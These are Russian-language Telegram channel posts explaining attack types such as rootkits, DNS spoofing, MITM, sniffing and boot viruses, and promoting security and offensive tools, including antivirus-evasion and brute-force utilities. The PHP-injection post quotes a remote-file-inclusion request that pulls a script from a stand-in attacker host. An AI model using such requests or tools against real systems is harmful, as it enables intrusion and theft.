Endeavour OS даёт возможность пользователю без лишних усложнений установить Arch Linux с необходимым рабочим столом в том виде, каким он задуман в своей штатной начинке, предлагаемой разработчиками выбранного рабочего стола, без дополнительных предустановленных программ.
Дистрибутив предлагает простой инсталлятор, где возможно установить один из типовых рабочих столов на основе Mate, LXQt, Cinnamon, KDE Plasma, GNOME, Budgie, а также мозаичных оконных менеджеров і3, BSPWM и Sway. Ведётся работа по добавлению поддержи оконных менеджеров Qtile и Openbox, рабочих столов UKUI, LXDE и Deepin. Xfce стоит по умолчанию.
#Arch #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5💩1
Полезный, регулярно обновляемый репозиторий для багбаунти, redteam и пентеста, содержащий подборку материалов по различным CVE уязвимостям.
#CVE #PoC
Please open Telegram to view this post
VIEW IN TELEGRAM
Руткит (англ. rootkit, то есть «набор root-а») — набор программных средств (исполняемых файлов, скриптов, конфигурационных файлов), обеспечивающих:
— маскировку объектов (процессов, файлов, каталогов, драйверов);
— управление (событиями, происходящими в системе);
— сбор данных (параметров системы).
Термин Rootkit исторически пришёл из мира UNIX, и под этим термином понимается набор утилит или специальный модуль ядра, которые хакер устанавливает на взломанной им компьютерной системе сразу после получения прав суперпользователя. Этот набор, включает в себя разнообразные утилиты для «заметания следов» вторжения в систему, делает незаметными снифферы, сканеры, кейлоггеры, троянские программы, замещающие основные утилиты UNIX.
#rootkit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11
DNS-спуфинг, также известный как отравление кэша DNS, является одной из форм взлома компьютерных сетей, в котором данные кэша доменных имен изменяются злоумышленником, с целью возврата ложного IP-адреса.
В статье вы узнаете, о том, что такое DNS-атаки, как они работают и как с ними бороться.
#DNS #spoofing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд.
— Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями.
Крэкеры анализируют такие уязвимости как неэкранированные переменные, получающие внешние значения. Например, старая уязвимость форума ExBB использовалась запросом:
GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.
#PHP #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
— Вы начнете с базового обзора синтаксиса языка и стоящей за ним философии, после чего перейдете к изучению примеров, которые пригодятся для разработки инструментов.
Вас ждет знакомство с протоколами HTTP, DNS и SMB. Далее вы перейдете к изучению различных тактик и задач, с которыми сталкиваются пентестеры, рассмотрите такие темы, как кража данных, сниффинг сетевых пакетов и разработка эксплойтов.
Вы научитесь создавать динамические встраиваемые инструменты, после чего перейдете к изучению криптографии, атаке на Windows и стеганографии.
#blackhat #books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🤡1🆒1
Атака посредника, или атака «человек посередине» — вид атаки в криптографии и компьютерной безопасности, когда хакер тайно ретранслирует и при необходимости изменяет связь между двумя сторонами, которые считают, что они непосредственно общаются друг с другом.
— Является методом компрометации канала связи, при котором взломщик, подключившись к каналу между контрагентами, осуществляет вмешательство в протокол передачи, удаляя или искажая информацию.
Одним из примеров атак типа «человек посередине» является активное прослушивание, при котором хакер устанавливает независимые связи с жертвами и передаёт сообщения между ними.
#MiTM #WiFi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
PCAPdroid - это приложение Android с открытым исходным кодом, которое позволяет отслеживать и экспортировать сетевой трафик вашего устройства.
— Приложение имитирует VPN для захвата без полномочий root, но, в отличие от VPN, трафик обрабатывается локально на устройстве.
#android #traffic
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Сниффинг пакетов - довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемому сниффером.
— В результате хакер может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили.
Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.
#sniffing
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤1👌1
Raspirus - это легкий сканер вредоносных программ на основе сигнатур.
Обычные пользователи могут загрузить исполняемый файл для своей операционной системы с веб-сайта или страницы выпуска GitHub. Разработчики могут найти подробные руководства по донастройке Raspirus в документации.
#scan
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
В этом материале покажем, как перехватить трафик вредоноса, и проанализировать его код, также изучим реверс-инжиниринг.
#Vulnerability
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3👏2
SMS Forwarder - отслеживает SMS-сообщения мобильного телефона Android, входящие вызовы, уведомления приложений и переадресовывает их на другие устройства через Telegram, WeChat, SMS, вебхук, e-mail, PushPlus и множество других сервисов по вашему выбору.
#spy
Please open Telegram to view this post
VIEW IN TELEGRAM
Загру́зочный ви́рус — компьютерный вирус, записывающийся в первый сектор гибкого или жёсткого диска и выполняющийся при загрузке компьютера с идущих после главной загрузочной записи (MBR), но до первого загрузочного сектора раздела. Перехватив обращения к дискам, вирус либо продолжает загрузку операционной системы, либо нет (MBR-Locker). Размножается вирус записью в загрузочную область других накопителей компьютера.
— Выделяют некоторую область диска и делают её недоступной для операционной системы.
— Замещают программу начальной загрузки в загрузочном секторе диска, копируя корректную программу загрузки, а также свой код, в выделенную область диска;
— Организуют передачу управления так, чтобы вначале выполнялся код вируса и лишь затем — программа начальной загрузки.
Загрузочные вирусы были широко распространены в эпоху MS-DOS.
Вирус Brain — первый в истории компьютерный вирус, вызвавший широкую эпидемию, относился именно к классу загрузочных. Во второй половине 1990-х годов в связи с повсеместным использованием 32-разрядных версий Windows загрузочные вирусы временно потеряли свою актуальность.
Однако в 2007 г. появилась новая разновидность вредоносных программ — руткиты, использующие те же технологии заражения дисков, что и загрузочные вирусы.(click: пост о руткитах)
#virus #vulnerability
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
OSINT: socialscan
socialscan - инструмент командной строки, для быстрой проверки использования адреса электронной почты и имени пользователя на различных онлайн-платформах.
⏺ Ссылка на GitHub
#Recon #Tools
socialscan - инструмент командной строки, для быстрой проверки использования адреса электронной почты и имени пользователя на различных онлайн-платформах.
#Recon #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👎3
This media is not supported in your browser
VIEW IN TELEGRAM
BlockchainBay - это инструмент для распространения торрентов , размещенный на блокчейне, совместимом с EVM.
Данная утилита схожа с проектом Pirate Bay, но использует в качестве базы данных EVM-совместимый блокчейн (Ethereum, Polygon, BSC).
— Выше прикрепили видеодемонстрацию данного инструмента.
#Torrent #EVM #Crypto
Please open Telegram to view this post
VIEW IN TELEGRAM
Атака на информационную систему — это совокупность преднамеренных действий хакера, направленных на нарушение одного из трех свойств информации — доступности, целостности или конфиденциальности.
Выделяют три этапа реализации атак:
1. Этап подготовки и сбора информации об объекте атаки.
2. Этап реализации атаки.
3. Этап устранения следов и информации об атаковавшем.
— Классификация атак на информационную систему может быть выполнена по нескольким признакам:
По месту возникновения:
1. Локальные атаки (источником данного вида атак являются пользователи и/или программы локальной системы);
2. Удалённые атаки (источником атаки выступают удалённые пользователи, сервисы или приложения).
По воздействию на информационную систему:
1. Активные атаки (результатом воздействия которых является нарушение деятельности информационной системы);
2. Пассивные атаки (ориентированные на получение информации из системы, не нарушая функционирование информационной системы).
#attack
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
DroidFS - это альтернативный способ использования зашифрованных файловых систем для Android.
— DroidFS использует собственный внутренний файловый проводник вместо монтирования виртуальных томов, с возможностью расшифровки и взаимодействия файлов с другими приложениями, но только с явного согласия пользователя и только через DroidFS.
#Android #manager
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Перехват UDP - это атака, при которой злоумышленник обманом заставляет жертву использовать свой компьютер как часть ботнета, обычно отправляя им незапрашиваемые запросы, замаскированные под поступающие из законных источников.
В этой статье рассмотрим метод перехвата сеанса путем манипулирования трафиком протокола.
#UDP
Please open Telegram to view this post
VIEW IN TELEGRAM
MsfMania - это инструмент командной строки, разработанный на Python, который предназначен для обхода антивирусного программного обеспечения в Windows и систем проверки VirusTotal.
#bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
demo.gif
17.6 MB
Инструмент Web-brutator может автоматически обнаруживать стандартные формы веб-аутентификации и автоматически выполнять брутфорс.
#Web #bruteforce
Please open Telegram to view this post
VIEW IN TELEGRAM